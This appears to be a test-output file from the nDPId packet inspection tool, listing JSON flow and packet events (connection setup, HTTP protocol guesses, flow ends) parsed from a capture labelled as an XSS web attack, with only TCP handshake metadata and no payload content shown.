-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347688364,"flow_last_seen":1499347688364,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688364,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":1,"flow_last_seen":1499347688364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347688364,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8C45AAD4GukKsEAABwKgKMunaAFB\/Haw5AAAAAKACchCgjwAAAgQFtAQCCAoBO6e3AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":2,"flow_last_seen":1499347688365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347688365,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6dpm6d+Cfx2sOqAScSDd8AAAAgQFtAQCCAoD5XksATuntwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":3,"flow_last_seen":1499347688365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347688365,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0C49AAD4GukmsEAABwKgKMunaAFB\/Haw6Zunfg4AQAOV8+AAAAQEICgE7p7cD5Xks"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347555255,"flow_last_seen":1499347560767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347555255,"flow_last_seen":1499347560767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347556523,"flow_last_seen":1499347561767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347556523,"flow_last_seen":1499347561767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347557789,"flow_last_seen":1499347563767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58468,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347557789,"flow_last_seen":1499347563767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347559043,"flow_last_seen":1499347564768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347559043,"flow_last_seen":1499347564768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347560327,"flow_last_seen":1499347565768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58496,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347560327,"flow_last_seen":1499347565768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347561622,"flow_last_seen":1499347566770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58510,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347561622,"flow_last_seen":1499347566770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347564211,"flow_last_seen":1499347569770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347564211,"flow_last_seen":1499347569770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347689613,"flow_last_seen":1499347689613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347689613,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":1,"flow_last_seen":1499347689613,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347689613,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80NlAAD4G9PasEAABwKgKMunoAFDCAng2AAAAAKACchCQZwAAAgQFtAQCCAoBO6jvAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":2,"flow_last_seen":1499347689613,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347689613,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6egCgzyzwgJ4N6AScSDTxgAAAgQFtAQCCAoD5XpkATuo7wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6046,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":3,"flow_last_seen":1499347689614,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347689614,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00NpAAD4G9P2sEAABwKgKMunoAFDCAng3AoM8tIAQAOVyzQAAAQEICgE7qPAD5Xpk"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347692128,"flow_last_seen":1499347692128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347692128,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":1,"flow_last_seen":1499347692128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347692128,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8u5xAAD4GCjSsEAABwKgKMuoCAFDepxD4AAAAAKACchDYcQAAAgQFtAQCCAoBO6tkAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":2,"flow_last_seen":1499347692128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347692128,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6gK6r2Hi3qcQ+aAScSA8AAAAAgQFtAQCCAoD5XzZATurZAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":3,"flow_last_seen":1499347692128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347692128,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0u51AAD4GCjusEAABwKgKMuoCAFDepxD5uq9h44AQAOXbBwAAAQEICgE7q2QD5XzZ"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347693386,"flow_last_seen":1499347693386,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347693386,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":1,"flow_last_seen":1499347693386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347693386,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8yJFAAD4G\/T6sEAABwKgKMuoQAFBhE2QOAAAAAKACchABpwAAAgQFtAQCCAoBO6yfAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":2,"flow_last_seen":1499347693386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347693386,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6hDs1hgmYRNkD6AScSB7jwAAAgQFtAQCCAoD5X4UATusnwEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":3,"flow_last_seen":1499347693387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347693387,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0yJJAAD4G\/UWsEAABwKgKMuoQAFBhE2QP7NYYJ4AQAOUalwAAAQEICgE7rJ8D5X4U"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347694661,"flow_last_seen":1499347694661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347694661,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59934,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":1,"flow_last_seen":1499347694661,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347694661,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8mmhAAD4GK2isEAABwKgKMuoeAFATaje1AAAAAKACchB6XQAAAgQFtAQCCAoBO63dAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6086,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":2,"flow_last_seen":1499347694661,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347694661,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6h4IeSXoE2o3tqAScSDJowAAAgQFtAQCCAoD5X9SATut3QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6087,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":3,"flow_last_seen":1499347694661,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347694661,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0mmlAAD4GK2+sEAABwKgKMuoeAFATaje2CHkl6YAQAOVoqgAAAQEICgE7rd4D5X9S"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347697189,"flow_last_seen":1499347697189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347697189,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":1,"flow_last_seen":1499347697189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347697189,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88ppAAD4G0zWsEAABwKgKMuo4AFBV\/kLMAAAAAKACchAqHwAAAgQFtAQCCAoBO7BWAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6104,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":2,"flow_last_seen":1499347697189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347697189,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6jj3l3auVf5CzaAScSA3CAAAAgQFtAQCCAoD5YHKATuwVgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6105,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":3,"flow_last_seen":1499347697190,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347697190,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08ptAAD4G0zysEAABwKgKMuo4AFBV\/kLN95d2r4AQAOXWDwAAAQEICgE7sFYD5YHK"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347698449,"flow_last_seen":1499347698449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698449,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":1,"flow_last_seen":1499347698449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347698449,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iq9AAD4GOyGsEAABwKgKMupGAFDXwDs\/AAAAAKACchCuoQAAAgQFtAQCCAoBO7GQAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":2,"flow_last_seen":1499347698449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347698449,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6kYJky3T18A7QKAScSDxLwAAAgQFtAQCCAoD5YMFATuxkAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":3,"flow_last_seen":1499347698449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347698449,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0irBAAD4GOyisEAABwKgKMupGAFDXwDtACZMt1IAQAOWQNgAAAQEICgE7sZED5YMF"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347565457,"flow_last_seen":1499347570771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58550,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347565457,"flow_last_seen":1499347570771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347566719,"flow_last_seen":1499347571771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58564,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347566719,"flow_last_seen":1499347571771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 